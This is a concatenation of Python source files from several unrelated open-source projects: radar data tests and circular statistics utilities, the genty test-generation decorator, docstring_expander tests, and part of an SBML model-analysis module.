assert 'long_name' in RADAR_RHI.azimuth
assert 'units' in RADAR_RHI.elevation
assert 'axis' in RADAR_RHI.elevation
assert RADAR_RHI.elevation['data'].shape == (283, )
assert_almost_equal(RADAR_RHI.elevation['data'][0], 19.6, 2)
# field data
def test_rhi_elevation():
assert_almost_equal(RADAR_RHI.fields['reflectivity']['data'][0, 0],
23.93, 2)
def test_open_from_file_obj():
fh = open(pyart.testing.MDV_PPI_FILE, 'rb')
radar = pyart.io.read_mdv(pyart.testing.MDV_PPI_FILE)
fh.close()
def test_radar_exclude_fields():
# skip fields
radar = pyart.io.read_mdv(
pyart.testing.MDV_PPI_FILE, exclude_fields=['reflectivity'])
assert 'reflectivity' not in radar.fields
```
#### File: retrieve/tests/test_gate_id.py
```python
import numpy as np
import netCDF4
import pyart
def test_map_profile_to_gates():
test_radar = pyart.testing.make_empty_ppi_radar(100, 360, 5)
foo_field = {'data': np.zeros([360 * 5, 100])}
test_radar.add_field('foo', foo_field)
z_dict, temp_dict = pyart.retrieve.map_profile_to_gates(
np.ones(100), np.linspace(0, 1000, 100), test_radar)
assert temp_dict['data'].mean() == 1.0
def test_fetch_radar_time_profile():
test_radar = pyart.testing.make_empty_ppi_radar(100, 360, 5)
test_radar.time['units'] = 'seconds since 2011-05-10T00:00:01Z'
test_radar.time['data'][0] = 41220. # 2nd time in interpolated sonde
sonde_dset = netCDF4.Dataset(pyart.testing.INTERP_SOUNDE_FILE)
dic = pyart.retrieve.fetch_radar_time_profile(sonde_dset, test_radar)
assert 'wdir' in dic
assert 'wspd' in dic
assert 'height' in dic
assert round(dic['wdir'][0]) == 185
```
#### File: pyart/util/circular_stats.py
```python
import numpy as np
# For details on these computation see:
# https://en.wikipedia.org/wiki/Directional_statistics
# https://en.wikipedia.org/wiki/Mean_of_circular_quantities
def angular_mean(angles):
"""
Compute the mean of a distribution of angles in radians.
Parameters
----------
angles : array like
Distribution of angles in radians.
Returns
-------
mean : float
The mean angle of the distribution in radians.
"""
angles = np.asanyarray(angles)
x = np.cos(angles)
y = np.sin(angles)
return np.arctan2(y.mean(), x.mean())
def angular_std(angles):
"""
Compute the standard deviation of a distribution of angles in radians.
Parameters
----------
angles : array like
Distribution of angles in radians.
Returns
-------
std : float
Standard deviation of the distribution.
"""
angles = np.asanyarray(angles)
x = np.cos(angles)
y = np.sin(angles)
norm = np.sqrt(x.mean()**2 + y.mean()**2)
return np.sqrt(-2 * np.log(norm))
def angular_mean_deg(angles):
"""
Compute the mean of a distribution of angles in degrees.
Parameters
----------
angles : array like
Distribution of angles in degrees.
Returns
-------
mean : float
The mean angle of the distribution in degrees.
"""
return np.rad2deg(angular_mean(np.deg2rad(angles)))
def angular_std_deg(angles):
"""
Compute the standard deviation of a distribution of angles in degrees.
Parameters
----------
angles : array like
Distribution of angles in degrees.
Returns
-------
std : float
Standard deviation of the distribution.
"""
return np.rad2deg(angular_std(np.deg2rad(angles)))
def interval_mean(dist, interval_min, interval_max):
"""
Compute the mean of a distribution within an interval.
Return the average of the array elements which are interpreted as being
taken from a circular interval with endpoints given by interval_min and
interval_max.
Parameters
----------
dist : array like
Distribution of values within an interval.
interval_min, interval_max : float
The endpoints of the interval.
Returns
-------
mean : float
The mean value of the distribution
"""
# transform distribution from original interval to [-pi, pi]
half_width = (interval_max - interval_min) / 2.
center = interval_min + half_width
a = (np.asarray(dist) - center) / (half_width) * np.pi
# compute the angular mean and convert back to original interval
a_mean = angular_mean(a)
return (a_mean * (half_width) / np.pi) + center
def interval_std(dist, interval_min, interval_max):
"""
Compute the standard deviation of a distribution within an interval.
Return the standard deviation of the array elements which are interpreted
as being taken from a circular interval with endpoints given by
interval_min and interval_max.
Parameters
----------
dist : array_like
Distribution of values within an interval.
interval_min, interval_max : float
The endpoints of the interval.
Returns
-------
std : float
The standard deviation of the distribution.
"""
# transform distribution from original interval to [-pi, pi]
half_width = (interval_max - interval_min) / 2.
center = interval_min + half_width
a = (np.asarray(dist) - center) / (half_width) * np.pi
# compute the angular standard dev. and convert back to original interval
a_std = angular_std(a)
return (a_std * (half_width) / np.pi)
```
#### File: pyart/util/xsect.py
```python
from copy import copy
import numpy as np
from ..core import Radar
def cross_section_ppi(radar, target_azimuths):
"""
Extract cross sections from a PPI volume along one or more azimuth angles.
Parameters
----------
radar : Radar
Radar volume containing PPI sweeps from which azimuthal
cross sections will be extracted.
target_azimuth : list
Azimuthal angles in degrees where cross sections will be taken.
Returns
-------
radar_rhi : Radar
Radar volume containing RHI sweeps which contain azimuthal
cross sections from the original PPI volume.
"""
# detemine which rays from the ppi radar make up the pseudo RHI
prhi_rays = []
rhi_nsweeps = len(target_azimuths)
ppi_nsweeps = radar.nsweeps
for target_azimuth in target_azimuths:
for sweep_slice in radar.iter_slice():
sweep_azimuths = radar.azimuth['data'][sweep_slice]
ray_number = np.argmin(np.abs(sweep_azimuths - target_azimuth))
prhi_rays.append(ray_number + sweep_slice.start)
_range = _copy_dic(radar.range)
latitude = _copy_dic(radar.latitude)
longitude = _copy_dic(radar.longitude)
altitude = _copy_dic(radar.altitude)
metadata = _copy_dic(radar.metadata)
scan_type = 'rhi'
time = _copy_dic(radar.time, excluded_keys=['data'])
time['data'] = radar.time['data'][prhi_rays].copy()
azimuth = _copy_dic(radar.azimuth, excluded_keys=['data'])
azimuth['data'] = radar.azimuth['data'][prhi_rays].copy()
elevation = _copy_dic(radar.elevation, excluded_keys=['data'])
elevation['data'] = radar.elevation['data'][prhi_rays].copy()
fields = {}
for field_name, orig_field_dic in radar.fields.items():
field_dic = _copy_dic(orig_field_dic, excluded_keys=['data'])
field_dic['data'] = orig_field_dic['data'][prhi_rays].copy()
fields[field_name] = field_dic
sweep_number = _copy_dic(radar.sweep_number, excluded_keys=['data'])
sweep_number['data'] = np.arange(rhi_nsweeps, dtype='int32')
sweep_mode = _copy_dic(radar.sweep_mode, excluded_keys=['data'])
sweep_mode['data'] = np.array(['rhi']*rhi_nsweeps)
fixed_angle = _copy_dic(radar.fixed_angle, excluded_keys=['data'])
fixed_angle['data'] = np.array(target_azimuths, dtype='float32')
sweep_start_ray_index = _copy_dic(
radar.sweep_start_ray_index, excluded_keys=['data'])
ssri = np.arange(rhi_nsweeps, dtype='int32') * ppi_nsweeps
sweep_start_ray_index['data'] = ssri
sweep_end_ray_index = _copy_dic(
radar.sweep_end_ray_index, excluded_keys=['data'])
seri = np.arange(rhi_nsweeps, dtype='int32')*ppi_nsweeps + ppi_nsweeps-1
sweep_end_ray_index['data'] = seri
radar_rhi = Radar(
time, _range, fields, metadata, scan_type,
latitude, longitude, altitude,
sweep_number, sweep_mode, fixed_angle,
sweep_start_ray_index, sweep_end_ray_index,
azimuth, elevation)
return radar_rhi
def _copy_dic(orig_dic, excluded_keys=None):
""" Return a copy of the original dictionary copying each element. """
if excluded_keys is None:
excluded_keys = []
dic = {}
for k, v in orig_dic.items():
if k not in excluded_keys:
dic[k] = copy(v)
return dic
``` |
{
"source": "josephhardinee/rca",
"score": 2
} |
#### File: rca/tests/alexis_test.py
```python
import pytest
# from rca.src.rca.module.calculate_dbz95 import calculate_dbz95_ppi
__author__ = "<NAME>"
__copyright__ = "<NAME>"
__license__ = "mit"
# Creating a sample function
def a_name(x):
print("First letter of ", x, " is:", x[0])
if x[0] == "A":
return 1
else:
return 0
def test_a_name():
assert a_name("Alexis") == 1
assert a_name("Brian") == 0
assert a_name("Apple") == 1
``` |
{
"source": "josephharrington/genty",
"score": 3
} |
#### File: test/genty/genty.py
```python
from __future__ import unicode_literals
import functools
import math
import types
import re
import sys
from box.test.genty.genty_args import GentyArgs
def genty(target_cls):
"""Decorator used in conjunction with @genty_dataset and @genty_repeat.
This decorator takes the information provided by @genty_dataset and
@genty_repeat and generates the corresponding test methods.
:param target_cls:
Test class whose test methods have been decorated.
:type target_cls:
`class`
"""
tests = _expand_tests(target_cls)
tests_with_datasets = _expand_datasets(tests)
tests_with_datasets_and_repeats = _expand_repeats(tests_with_datasets)
_add_new_test_methods(target_cls, tests_with_datasets_and_repeats)
return target_cls
def _expand_tests(target_cls):
"""
Generator of all the test unbound functions in the given class.
:param target_cls:
Target test class.
:type target_cls:
`class`
:return:
Generator of all the test_methods in the given class yielding
tuples of method name and unbound function.
:rtype:
`generator` of `tuple` of (`unicode`, `function`)
"""
entries = dict(target_cls.__dict__.iteritems())
for key, value in entries.iteritems():
if key.startswith('test') and isinstance(value, types.FunctionType):
if not hasattr(value, 'genty_generated_test'):
yield key, value
def _expand_datasets(test_functions):
"""
Generator producing test_methods, with an optional dataset.
:param test_functions:
Iterator over tuples of test name and test unbound function.
:type test_functions:
`iterator` of `tuple` of (`unicode`, `function`)
:return:
Generator yielding a tuple of
(method_name, unbound function, dataset name, dataset)
:rtype:
`generator` of `tuple` of
(`unicode`, `function`, `unicode` or None, `tuple` or None)
"""
for name, func in test_functions:
datasets = getattr(func, 'genty_datasets', {})
if datasets:
for dataset_name, dataset in datasets.iteritems():
yield name, func, dataset_name, dataset
else:
yield name, func, None, None
def _expand_repeats(test_functions):
"""
Generator producing test_methods, with any repeat count unrolled.
:param test_functions:
Sequence of tuples of
(test_method_name, test unbound function, dataset name, dataset)
:type test_functions:
`iterator` of `tuple` of
(`unicode`, `function`, `unicode` or None, `tuple` or None)
:return:
Generator yielding a tuple of
(method_name, unbound function, dataset, name dataset, repeat_suffix)
:rtype:
`generator` of `tuple` of (`unicode`, `function`,
`unicode` or None, `tuple` or None, `unicode`)
"""
for name, func, dataset_name, dataset in test_functions:
repeat_count = getattr(func, 'genty_repeat_count', 0)
if repeat_count:
for i in xrange(1, repeat_count + 1):
repeat_suffix = _build_repeat_suffix(i, repeat_count)
yield name, func, dataset_name, dataset, repeat_suffix
elif dataset:
yield name, func, dataset_name, dataset, None
def _add_new_test_methods(target_cls, tests_with_datasets_and_repeats):
"""Define the given tests in the given class.
:param target_cls:
Test class where to define the given test methods.
:type target_cls:
`class`
:param tests_with_datasets_and_repeats:
Sequence of tuples describing the new test to add to the class.
(method_name, unbound function, dataset name, dataset , repeat_suffix)
:type tests_with_datasets_and_repeats:
Sequence of `tuple` of (`unicode`, `function`,
`unicode` or None, `tuple` or None, `unicode`)
"""
for test_info in tests_with_datasets_and_repeats:
method_name, func, dataset_name, dataset, repeat_suffix = test_info
# Remove the original test_method as it's superseded by this
# generated method.
is_first_reference = _delete_original_test_method(
target_cls,
method_name,
)
# However, if that test_method is referenced by name in sys.argv
# Then take 1 of the generated methods (we take the first) and
# give that generated method the original name... so that the reference
# can find an actual test method.
if is_first_reference and _is_referenced_in_argv(method_name):
dataset_name = None
repeat_suffix = None
_add_method_to_class(
target_cls,
method_name,
func,
dataset_name,
dataset,
repeat_suffix,
)
def _is_referenced_in_argv(method_name):
"""
Various test runners allow one to run a specific test like so:
python -m unittest -v <test_module>.<test_name>
Return True is the given method name is so referenced.
:param method_name:
Base name of the method to add.
:type method_name:
`unicode`
:return:
Is the given method referenced by the command line.
:rtype:
`bool`
"""
expr = '.*[:.]{}$'.format(method_name)
regex = re.compile(expr)
return any(regex.match(arg) for arg in sys.argv)
def _build_repeat_suffix(iteration, count):
"""
Return the suffix string to identify iteration X out of Y.
For example, with a count of 100, this will build strings like
"iteration_053" or "iteration_008".
:param iteration:
Current iteration.
:type iteration:
`int`
:param count:
Total number of iterations.
:type count:
`int`
:return:
Repeat suffix.
:rtype:
`unicode`
"""
format_width = int(math.ceil(math.log(count + 1, 10)))
new_suffix = 'iteration_{:0{width}d}'.format(iteration, width=format_width)
return new_suffix
def _delete_original_test_method(target_cls, name):
"""
Delete an original test method with the given name.
:param target_cls:
Target class.
:type target_cls:
`class`
:param name:
Name of the method to remove.
:type name:
`unicode`
:return:
True if the original method existed
:rtype:
`bool`
"""
attribute = getattr(target_cls, name, None)
if attribute and not getattr(attribute, 'genty_generated_test', None):
delattr(target_cls, name)
return True
else:
return False
def _build_final_method_name(method_name, dataset_name, repeat_suffix):
"""
Return a nice human friendly name, that almost looks like code.
Example: a test called 'test_something' with a dataset of (5, 'hello')
Return: "test_something(5, 'hello')"
Example: a test called 'test_other_stuff' with dataset of (9) and repeats
Return: "test_other_stuff(9) iteration_<X>"
:param method_name:
Base name of the method to add.
:type method_name:
`unicode`
:param dataset_name:
Base name of the data set.
:type dataset_name:
`unicode` or None
:param repeat_suffix:
Suffix to append to the name of the generated method.
:type repeat_suffix:
`unicode` or None
:return:
The fully composed name of the generated test method.
:rtype:
`unicode`
"""
if not dataset_name and not repeat_suffix:
return method_name
# Place data_set info inside parens, as if it were a function call
test_method_suffix = '({})'.format(dataset_name or "")
if repeat_suffix:
test_method_suffix = test_method_suffix + " " + repeat_suffix
test_method_name_for_dataset = "{}{}".format(
method_name,
test_method_suffix,
)
return test_method_name_for_dataset
def _build_method_wrapper(method, dataset):
if dataset:
# Create the test method with the given data set.
if isinstance(dataset, GentyArgs):
test_method_for_dataset = lambda my_self: method(
my_self,
*dataset.args,
**dataset.kwargs
)
else:
test_method_for_dataset = lambda my_self: method(my_self, *dataset)
else:
test_method_for_dataset = lambda my_self: method(my_self)
return test_method_for_dataset
def _add_method_to_class(
target_cls,
method_name,
func,
dataset_name,
dataset,
repeat_suffix,
):
"""
Add the described method to the given class.
:param target_cls:
Test class to which to add a method.
:type target_cls:
`class`
:param method_name:
Base name of the method to add.
:type method_name:
`unicode`
:param func:
The test function to add.
:type func:
`callable`
:param dataset_name:
Base name of the data set.
:type dataset_name:
`unicode` or None
:param dataset:
Tuple containing the args of the dataset.
:type dataset:
`tuple` or None
:param repeat_suffix:
Suffix to append to the name of the generated method.
:type repeat_suffix:
`unicode` or None
"""
test_method_name_for_dataset = _build_final_method_name(
method_name,
dataset_name,
repeat_suffix,
)
test_method_for_dataset = _build_method_wrapper(func, dataset)
test_method_for_dataset = functools.update_wrapper(
test_method_for_dataset,
func,
)
test_method_name_for_dataset = test_method_name_for_dataset.encode(
'utf-8',
'replace',
)
test_method_for_dataset.__name__ = test_method_name_for_dataset
test_method_for_dataset.genty_generated_test = True
# Add the method to the class under the proper name
setattr(target_cls, test_method_name_for_dataset, test_method_for_dataset)
``` |
{
"source": "joseph-hellerstein/kwmgr",
"score": 2
} |
#### File: joseph-hellerstein/kwmgr/setup.py
```python
from setuptools import setup
with open("README.md", "r") as fh:
long_description = fh.read()
INSTALL_REQUIRES = [
]
def doSetup(install_requires):
setup(
name='docstring_expander',
version='0.23',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/joseph-hellerstein/docstring_expander.git',
description='Enables intellisense for **kwargs',
long_description=long_description,
long_description_content_type='text/markdown',
packages=['docstring_expander'],
package_dir={'docstring_expander':
'docstring_expander'},
install_requires=install_requires,
include_package_data=True,
)
if __name__ == '__main__':
doSetup(INSTALL_REQUIRES)
```
#### File: kwmgr/tests/test_expander.py
```python
from docstring_expander.expander import Expander
from docstring_expander.kwarg import Kwarg
import copy
import unittest
IGNORE_TEST = False
KWARGS = [
Kwarg("num_col", default=3, doc="number of columns", dtype=int),
Kwarg("num_row", default=3, doc="number of rows"),
Kwarg("num_plot", doc="number of plots", dtype=int),
Kwarg("plot_title", doc="Title of the plot", dtype=str),
Kwarg("title_font", doc="Font size for plot", dtype=float),
Kwarg("dummy"),
]
HEADER = """
Header line 1
Header line 2
"""
TRAILER = """
Trailer line 1
Trailer line 2
"""
BASE = ["num_row", "num_col", "title_font", "plot_title"]
DOCSTRING = """
This is a test function.
Parameters
----------
#@expand
"""
def func(arg, **kwargs):
"""
This is a test function.
Parameters
----------
#@expand
"""
return kwargs.values()
@Expander(KWARGS, BASE)
def funcExpanded(arg, **kwargs):
"""
This is a test function.
Parameters
----------
#@expand
"""
return kwargs.values()
class TestExpander(unittest.TestCase):
def setUp(self):
self.expander = Expander(KWARGS, BASE)
self.func = copy.deepcopy(func)
self.func.__doc__ = DOCSTRING
def testConstructor(self):
if IGNORE_TEST:
return
diff = set(self.expander.keywords).symmetric_difference(BASE)
self.assertEqual(len(diff), 0)
def testCall(self):
if IGNORE_TEST:
return
new_func = self.expander.__call__(self.func)
for key in BASE:
self.assertTrue(key in new_func.__doc__)
def testCallHeader(self):
if IGNORE_TEST:
return
expander = Expander(KWARGS, BASE, header=HEADER)
new_func = expander.__call__(self.func)
self.assertTrue("Header" in new_func.__doc__)
def testCallTrailer(self):
if IGNORE_TEST:
return
expander = Expander(KWARGS, BASE, trailer=TRAILER)
new_func = expander.__call__(self.func)
self.assertTrue("Trailer" in new_func.__doc__)
def testDecorator(self):
if IGNORE_TEST:
return
new_func = self.expander.__call__(self.func)
self.assertTrue(new_func.__doc__, funcExpanded.__doc__)
def construct(self, excludes=[], includes=[]):
expander = Expander(KWARGS, BASE, excludes=excludes, includes=includes)
new_func = expander.__call__(self.func)
return new_func.__doc__
def testExclude(self):
if IGNORE_TEST:
return
#
string = self.construct(excludes=BASE[1:])
for key in BASE[1:]:
self.assertFalse(key in string)
def testInclude(self):
if IGNORE_TEST:
return
string = self.construct(includes=["num_plot"])
a_list = list(BASE)
a_list.append("num_plot")
for key in a_list:
self.assertTrue(key in string)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "joseph-hellerstein/mapping",
"score": 3
} |
#### File: mapping/examples/util.py
```python
def getKey():
with open("../apikey.txt", "r") as fd:
return fd.read()
def getMapboxToken():
with open("../mapbox_token.txt", "r") as fd:
return fd.read()
``` |
{
"source": "joseph-hellerstein/RuleBasedProgramming",
"score": 2
} |
#### File: SBMLparser/atomizer/analyzeSBML.py
```python
from pyparsing import Word, Suppress,Optional,alphanums,Group,ZeroOrMore
import numpy as np
import json
import itertools
import utils.structures as st
from copy import deepcopy,copy
import detectOntology
import re
import difflib
from utils.util import logMess
from collections import defaultdict
import itertools
import math
from collections import Counter
import re
from utils.util import pmemoize as memoize
'''
This file in general classifies rules according to the information contained in
the json config file for classyfying rules according to their reactants/products
'''
@memoize
def get_close_matches(match, dataset, cutoff=0.6):
return difflib.get_close_matches(match, dataset, cutoff=cutoff)
@memoize
def sequenceMatcher(a,b):
'''
compares two strings ignoring underscores
'''
return difflib.SequenceMatcher(lambda x:x == '_',a,b).ratio()
name = Word(alphanums + '_-') + ':'
species = (Word(alphanums + "_" + ":#-")
+ Suppress('()') + Optional(Suppress('@' + Word(alphanums + '_-')))) + ZeroOrMore(Suppress('+') + Word(alphanums + "_" + ":#-")
+ Suppress("()") + Optional(Suppress('@' + Word(alphanums + '_-'))))
rate = Word(alphanums + "()")
grammar = Suppress(Optional(name)) + ((Group(species) | '0') + Suppress(Optional("<") + "->") + (Group(species) | '0') + Suppress(rate))
@memoize
def parseReactions(reaction, specialSymbols=''):
if reaction.startswith('#'):
return None
result = grammar.parseString(reaction).asList()
if len(result) < 2:
result = [result, []]
if '<->' in reaction and len(result[0]) == 1 and len(result[1]) == 2:
result.reverse()
return result
def addToDependencyGraph(dependencyGraph, label, value):
if label not in dependencyGraph:
dependencyGraph[label] = []
if value not in dependencyGraph[label] and value != []:
dependencyGraph[label].append(value)
class SBMLAnalyzer:
def __init__(self, modelParser, configurationFile, namingConventions, speciesEquivalences=None, conservationOfMass = True):
self.modelParser = modelParser
self.configurationFile = configurationFile
self.namingConventions = detectOntology.loadOntology(namingConventions)
self.userNamingConventions = copy(self.namingConventions)
self.speciesEquivalences = speciesEquivalences
self.userEquivalencesDict = None
self.lexicalSpecies = []
self.conservationOfMass = conservationOfMass
def distanceToModification(self, particle, modifiedElement, translationKeys):
posparticlePos = [m.start() + len(particle) for m in re.finditer(particle, modifiedElement)]
preparticlePos = [m.start() for m in re.finditer(particle, modifiedElement)]
keyPos = [m.start() for m in re.finditer(translationKeys, modifiedElement)]
distance = [abs(y-x) for x in posparticlePos for y in keyPos]
distance.extend([abs(y-x) for x in preparticlePos for y in keyPos])
distance.append(9999)
return min(distance)
def fuzzyArtificialReaction(self,baseElements,modifiedElement,molecules):
'''
in case we don't know how a species is composed but we know its base
elements, try to get it by concatenating its basic reactants
'''
import collections
compare = lambda x, y: collections.Counter(x) == collections.Counter(y)
equivalenceTranslator,translationKeys,conventionDict = self.processNamingConventions2(molecules)
indirectEquivalenceTranslator= {x:[] for x in equivalenceTranslator}
self.processFuzzyReaction([baseElements,modifiedElement],translationKeys,conventionDict,indirectEquivalenceTranslator)
newBaseElements = baseElements
for modification in indirectEquivalenceTranslator:
for element in indirectEquivalenceTranslator[modification]:
newBaseElements = [element[2][1] if x==element[2][0] else x for x in newBaseElements]
if compare(baseElements,newBaseElements):
return None
return newBaseElements
def analyzeSpeciesModification2(self, baseElement, modifiedElement, partialAnalysis):
"""
A method to read modifications within complexes.
"""
def index_min(values):
return min(xrange(len(values)), key=values.__getitem__)
equivalenceTranslator, translationKeys, conventionDict = self.processNamingConventions2([baseElement, modifiedElement])
differencePosition = [(i, x) for i, x in enumerate(difflib.ndiff(baseElement, modifiedElement)) if x.startswith('+')]
tmp = ''
lastIdx = 0
newDifferencePosition = []
for i in range(len(differencePosition)):
tmp += differencePosition[i][1][-1]
if tmp in translationKeys:
newDifferencePosition.append(((differencePosition[lastIdx][0] + differencePosition[i][0]) / 2, tmp))
tmp = ''
lastIdx = i
differencePosition = newDifferencePosition
if len(differencePosition) == 0:
return None, None, None
sortedPartialAnalysis = sorted(partialAnalysis, key=len, reverse=True)
tokenPosition = []
tmpModifiedElement = modifiedElement
for token in sortedPartialAnalysis:
sequenceMatcher = difflib.SequenceMatcher(None, token, tmpModifiedElement)
#sequenceMatcher2 = difflib.SequenceMatcher(None,token,baseElement)
modifiedMatchingBlocks = [m.span() for m in re.finditer(token, tmpModifiedElement)]
baseMatchingBlocks = [m.span() for m in re.finditer(token, baseElement)]
#matchingBlocks = [x for x in modifiedMatchingBlocks for y in baseMatching Blocks if ]
if len(modifiedMatchingBlocks) > 0 and len(baseMatchingBlocks) > 0:
#select the matching block with the lowest distance to the base matching block
matchingBlockIdx = index_min([min([abs((y[1]+y[0])/2 - (x[1]+x[0])/2) for y in baseMatchingBlocks]) for x in modifiedMatchingBlocks])
matchingBlock = modifiedMatchingBlocks[matchingBlockIdx]
tmpModifiedElement = list(tmpModifiedElement)
for idx in range(matchingBlock[0],matchingBlock[1]):
tmpModifiedElement[idx] = '_'
tmpModifiedElement = ''.join(tmpModifiedElement)
tokenPosition.append((matchingBlock[0],matchingBlock[1]-1))
else:
#try fuzzy search
sequenceMatcher = difflib.SequenceMatcher(None,token,tmpModifiedElement)
match = ''.join(tmpModifiedElement[j:j+n] for i, j, n in sequenceMatcher.get_matching_blocks() if n)
if (len(match)) / float(len(token)) < 0.8:
tokenPosition.append([999999999])
else:
tmp = [i for i, y in enumerate(difflib.ndiff(token, tmpModifiedElement)) if not y.startswith('+')]
if tmp[-1] - tmp[0] > len(token) + 5:
tokenPosition.append([999999999])
continue
tmpModifiedElement = list(tmpModifiedElement)
for idx in tmp:
if idx< len(tmpModifiedElement):
tmpModifiedElement[idx] = '_'
tmpModifiedElement = ''.join(tmpModifiedElement)
tmp = [tmp[0],tmp[-1]-1]
tokenPosition.append(tmp)
intersection = []
for difference in differencePosition:
distance = []
for token in tokenPosition:
distance.append(min([abs(difference[0] - subtoken) for subtoken in token]))
closestToken = sortedPartialAnalysis[index_min(distance)]
#if difference[1] in conventionDict:
intersection.append([difference[1],closestToken,min(distance)])
minimumToken = min(intersection,key=lambda x:x[2])
if intersection:
return minimumToken[1],translationKeys, equivalenceTranslator
return None, None, None
def analyzeSpeciesModification(self, baseElement, modifiedElement, partialAnalysis):
'''
a method for trying to read modifications within complexes
This is only possible once we know their internal structure
(this method is called after the creation and resolving of the dependency
graph)
'''
equivalenceTranslator, translationKeys, conventionDict = self.processNamingConventions2([baseElement, modifiedElement])
scores = []
if len(translationKeys) == 0:
'''
there's no clear lexical path between reactant and product
'''
return None, None, None
for particle in partialAnalysis:
distance = 9999
comparisonElement = max(baseElement, modifiedElement, key=len)
if re.search('(_|^){0}(_|$)'.format(particle), comparisonElement) == None:
distance = self.distanceToModification(particle, comparisonElement, translationKeys[0])
score = difflib.ndiff(particle, modifiedElement)
else:
# FIXME: make sure we only do a search on those variables that are viable
# candidates. this is once again fuzzy string matchign. there should
# be a better way of doing this with difflib
permutations = set(['_'.join(x) for x in itertools.permutations(partialAnalysis, 2) if x[0] == particle])
if all([x not in modifiedElement for x in permutations]):
distance = self.distanceToModification(particle, comparisonElement, translationKeys[0])
score = difflib.ndiff(particle, modifiedElement)
# FIXME:tis is just an ad-hoc parameter in terms of how far a mod is from a species name
# use something better
if distance < 4:
scores.append([particle, distance])
if len(scores) > 0:
winner = scores[[x[1] for x in scores].index(min([x[1] for x in scores]))][0]
else:
winner = None
if winner:
return winner, translationKeys, equivalenceTranslator
return None, None, None
def findMatchingModification(self, particle, species):
@memoize
def findMatchingModificationHelper(particle, species):
difference = difflib.ndiff(species,particle)
differenceList = tuple([x for x in difference if '+' in x])
if differenceList in self.namingConventions['patterns']:
return [self.namingConventions['patterns'][differenceList]]
fuzzyKey = ''.join([x[2:] for x in differenceList])
differenceList = self.testAgainstExistingConventions(fuzzyKey,self.namingConventions['modificationList'])
#can we state the modification as the combination of multiple modifications
if differenceList:
classificationList = []
for x in differenceList[0]:
differenceKey = tuple(['+ {0}'.format(letter) for letter in x])
classificationList.append(self.namingConventions['patterns'][differenceKey])
return classificationList
return None
return findMatchingModificationHelper(particle,species)
def greedyModificationMatching(self,speciesString, referenceSpecies):
'''
recursive function trying to map a given species string to a string permutation of the strings in reference species
>>> sa = SBMLAnalyzer(None,'./config/reactionDefinitions.json','./config/namingConventions.json')
>>> sorted(sa.greedyModificationMatching('EGF_EGFR',['EGF','EGFR']))
['EGF', 'EGFR']
>>> sorted(sa.greedyModificationMatching('EGF_EGFR_2_P_Grb2',['EGF','EGFR','EGF_EGFR_2_P','Grb2']))
['EGF_EGFR_2_P', 'Grb2']
>>> sorted(sa.greedyModificationMatching('A_B_C_D',['A','B','C','C_D','A_B_C','A_B']))
['A_B', 'C_D']
'''
bestMatch = ['', 0]
finalMatches = []
blacklist = []
while(len(blacklist)< len(referenceSpecies)):
localReferenceSpecies = [x for x in referenceSpecies if x not in blacklist and len(x) <= len(speciesString)]
for species in localReferenceSpecies:
if species in speciesString and len(species) > bestMatch[1] and species != speciesString:
bestMatch = [species,len(species)]
if bestMatch != ['', 0]:
result = self.greedyModificationMatching(speciesString.replace(bestMatch[0],''), referenceSpecies)
finalMatches = [bestMatch[0]]
if result == -1:
finalMatches = []
blacklist.append(bestMatch[0])
bestMatch = ['',0]
continue
elif result != -2:
finalMatches.extend(result)
break
elif len([x for x in speciesString if x != '_']) > 0:
return -1
else:
return -2
return finalMatches
def findClosestModification(self, particles, species, annotationDict, originalDependencyGraph):
'''
maps a set of particles to the complete set of species using lexical analysis. This step is done
independent of the reaction network.
'''
equivalenceTranslator = {}
dependencyGraph = {}
localSpeciesDict = defaultdict(lambda : defaultdict(list))
def analyzeByParticle(splitparticle,species,
equivalenceTranslator=equivalenceTranslator,
dependencyGraph=dependencyGraph):
basicElements = []
composingElements = []
splitpindex = -1
#for splitpindex in range(0,len(splitparticle)):
while (splitpindex + 1)< len(splitparticle):
splitpindex += 1
splitp = splitparticle[splitpindex]
if splitp in species:
closestList = [splitp]
similarList = get_close_matches(splitp,species)
similarList = [x for x in similarList if x != splitp and len(x) < len(splitp)]
similarList = [[x,splitp] for x in similarList]
if len(similarList) > 0:
for similarity in similarList:
#compare close lexical proximity
fuzzyList = self.processAdHocNamingConventions(similarity[0],
similarity[1],localSpeciesDict,False,species)
for reaction,tag,modifier in fuzzyList:
if modifier != None and all(['-' not in x for x in modifier]):
logMess('INFO:LAE001','Lexical relationship inferred between \
{0}, user information confirming it is required'.format(similarity))
else:
closestList = get_close_matches(splitp,species)
closestList = [x for x in closestList if len(x) < len(splitp)]
#if theres nothing in the species list i can find a lexical
#neighbor from, then try to create one based on my two
#positional neighbors
if closestList == []:
flag= True
#do i get something by merging with the previous component?
if len(composingElements) > 0:
tmp,tmp2 = analyzeByParticle([composingElements[-1] + '_' + splitp], species)
if tmp != [] and tmp2 != []:
flag = False
splitp = composingElements[-1] + '_' + splitp
composingElements.pop()
closestList = tmp
localEquivalenceTranslator,_,_ = self.processNamingConventions2([tmp[0],tmp2[0]])
for element in localEquivalenceTranslator:
if element not in equivalenceTranslator:
equivalenceTranslator[element] = []
equivalenceTranslator[element].extend(localEquivalenceTranslator[element])
for instance in localEquivalenceTranslator[element]:
addToDependencyGraph(dependencyGraph,instance[1],[instance[0]])
#do i get something by merging with the next component?
if flag and splitpindex + 1 != len(splitparticle):
tmp,tmp2 = analyzeByParticle([splitp+ '_' + splitparticle[splitpindex+1]],species)
if tmp!= [] and tmp2 != []:
splitp = splitp+ '_' + splitparticle[splitpindex+1]
splitpindex += 1
closestList = tmp
localEquivalenceTranslator,_,_ = self.processNamingConventions2([tmp[0],tmp2[0]])
for element in localEquivalenceTranslator:
if element not in equivalenceTranslator:
equivalenceTranslator[element] = []
equivalenceTranslator[element].append(localEquivalenceTranslator[element])
for instance in localEquivalenceTranslator[element]:
addToDependencyGraph(dependencyGraph,instance[1],[instance[0]])
else:
return [],[]
elif flag:
return [],[]
basicElements.append(min(closestList,key=len))
#if what i have is a known compound just add it
if splitp in species:
composingElements.append(splitp)
#if not create it
else:
closestList = get_close_matches(splitp,species)
closestList = [x for x in closestList if len(x) < len(splitp)]
flag = False
for element in closestList:
localEquivalenceTranslator,_,_ = self.processNamingConventions2([element,splitp])
if len(localEquivalenceTranslator.keys()) == 0:
basicElements = []
composingElements = []
for element in localEquivalenceTranslator:
if element not in equivalenceTranslator:
equivalenceTranslator[element] = []
equivalenceTranslator[element].append(localEquivalenceTranslator[element])
for instance in localEquivalenceTranslator[element]:
